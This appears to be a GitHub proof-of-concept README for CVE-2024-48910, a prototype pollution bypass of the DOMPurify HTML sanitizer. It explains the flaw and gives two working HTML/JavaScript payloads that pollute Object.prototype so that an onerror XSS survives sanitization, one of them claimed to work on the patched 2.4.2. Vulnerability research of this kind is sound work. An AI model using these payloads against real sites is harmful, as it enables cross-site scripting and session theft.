# CVE-2024-48910-PoC
<img width="397" height="653" alt="image" src="https://github.com/user-attachments/assets/c323b53d-627e-43f1-a1dd-47b66cb3faec" />

## Overview

**CVE-2024-48910** DOMPurify, a DOM-only, super-fast, uber-tolerant XSS sanitizer for HTML, MathML and SVG, was found to be vulnerable to prototype pollution (CVE-2024-48910). The vulnerability was discovered and fixed in version 2.4.2, with the initial disclosure made on October 31, 2024 .

---

## Impact

The prototype pollution vulnerability in DOMPurify could allow attackers to tamper with object prototype attributes, potentially leading to security bypasses and unauthorized modifications of application behavior. The high CVSS score indicates significant potential impact on system security, particularly affecting data confidentiality and integrity 

## Technical Details

The vulnerability has been assigned a CVSS v3.1 base score of 9.1 (CRITICAL) with the vector string CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N. This indicates that the vulnerability can be exploited remotely with low attack complexity, requires no privileges or user interaction, and can result in high impact to both confidentiality and integrity, though without affecting availability



From Change logs, you can see a test case was added involving `.__proto__.`, suggesting it is a prototype injection
<img width="1289" height="665" alt="image" src="https://github.com/user-attachments/assets/43757627-0d76-4b98-b2c2-c0b4b82018b3" />

The next line which was added was, meaning that before is was evaluating to `true` for anything that was `truthy`
<img width="1167" height="257" alt="image" src="https://github.com/user-attachments/assets/250f94ae-5b27-444d-b5a6-fafa5f7f54fa" />



## Attack Flow & PoC 

1) Pollute hasOwnProperty to return Object
2) Pollute ALLOWED_ATTR with ["src", "onerror"]
3) DOMPurify clones its config using vulnerable clone() function
4) hasOwnProperty check passes for polluted properties (because Object is truthy)
5) Polluted config gets copied into DOMPurify's internal configuration

XSS protection bypassed - onerror is now "allowed"
```
<script>Object.prototype.hasOwnProperty=Object</script>
<script>Object.prototype.ALLOWED_ATTR=["src","onerror"]</script>
<script src=//cdn.jsdelivr.net/npm/dompurify@2.4.1/dist/purify.min.js></script>
<script>document.write(DOMPurify.sanitize('<img src=x onerror=alert(1)>'))</script>
```


## Side Notes:

Despite upgrading to 2.4.2, I can still get the `alert()` to showup... all you have to do is set 
`Object.prototype.hasOwnProperty = () => true;` to bypass the protection LOL!!

```
<script>Object.prototype.hasOwnProperty = () => true;</script>
<script>Object.prototype.ALLOWED_ATTR=["src","onerror"]</script>
<script src=//cdn.jsdelivr.net/npm/dompurify@2.4.2/dist/purify.min.js></script>
<script>document.write(DOMPurify.sanitize('<img src=x onerror=alert(2)>'))</script>
```


